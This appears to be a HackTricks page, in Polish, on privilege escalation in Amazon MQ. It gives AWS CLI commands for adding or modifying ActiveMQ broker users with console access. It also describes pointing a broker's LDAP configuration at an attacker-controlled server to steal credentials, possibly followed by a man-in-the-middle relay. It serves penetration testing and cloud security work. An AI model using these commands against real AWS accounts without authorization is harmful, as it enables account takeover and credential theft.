AWS - MQ Privesc

Wesprzyj HackTricks

MQ

Aby uzyskać więcej informacji na temat MQ, sprawdź:

AWS - MQ Enum

mq:ListBrokers, mq:CreateUser

Z tymi uprawnieniami możesz utworzyć nowego użytkownika w brokerze ActimeMQ (to nie działa w RabbitMQ):

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Potencjalne skutki: Dostęp do wrażliwych informacji podczas poruszania się po ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

Z tymi uprawnieniami możesz utworzyć nowego użytkownika w brokerze ActimeMQ (to nie działa w RabbitMQ):

aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Potencjalne skutki: Dostęp do wrażliwych informacji podczas nawigacji przez ActiveMQ

mq:ListBrokers, mq:UpdateBroker

Jeśli broker używa LDAP do autoryzacji z ActiveMQ. Istnieje możliwość zmiany konfiguracji serwera LDAP na ten kontrolowany przez atakującego. W ten sposób atakujący będzie mógł ukraść wszystkie dane uwierzytelniające przesyłane przez LDAP.

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

Jeśli udałoby ci się znaleźć oryginalne dane uwierzytelniające używane przez ActiveMQ, mógłbyś przeprowadzić atak typu MitM, ukraść dane uwierzytelniające, użyć ich na oryginalnym serwerze i wysłać odpowiedź (może wystarczy ponownie wykorzystać skradzione dane uwierzytelniające).

Potencjalny wpływ: Kradzież danych uwierzytelniających ActiveMQ

Wesprzyj HackTricks

Last updated